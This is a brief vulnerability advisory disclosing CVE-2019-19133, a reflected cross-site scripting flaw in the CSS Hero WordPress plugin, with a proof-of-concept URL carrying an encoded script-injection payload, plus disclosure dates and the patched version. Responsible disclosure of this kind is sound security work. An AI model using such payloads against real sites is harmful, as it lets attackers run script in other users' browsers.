Share
Team,  
  
  
Document Title  
  
===============  
  
CVE-2019-19133  
  
Reflected XSS in CSS Hero (<= v.4.0.3) WordPress plugin.  
  
  
  
Product Description  
  
===============  
  
CSS Hero WordPress Plugin  
  
A live WordPress Theme editor that works without modifying any of your  
theme files. Very low performance footprint: only generates and adds a  
single static CSS file to your site.  
  
Homepage: https://www.csshero.org/  
  
  
  
CSS Hero is vulnerable to a reflected XSS attack (authenticated).  
  
  
  
PoC  
  
===============  
  
Steps:  
  
1) Authenticate to the WordPress application with the CSS Hero plugin installed.  
  
2) Navigate to the following vulnerable link:  
  
  
  
hxxp://  
vulnerable.wordpress.com/?csshero_action=edit_page&rand=1015&foo%22%3E%3C/iframe%3E%3Cscript%3Ealert(%27Reflected%20XSS%20in%20CSS%20Hero%204.0.3%27)%3C/script%3E%3Ciframe%3Ebar  
  
3) JavaScript executes within the context of the browser. The  
arbitrary parameter and value are reflected into the returned HTML.  
  
  
  
Responsible Disclosure Information  
  
===============  
  
Vendor Contacted: 11/17  
  
Date Patched: 11/20  
  
Patched Version: v.4.0.7  
  
Public Disclosure: 12/2  
  
  
  
Cary Hooper  
  
@nopantrootdance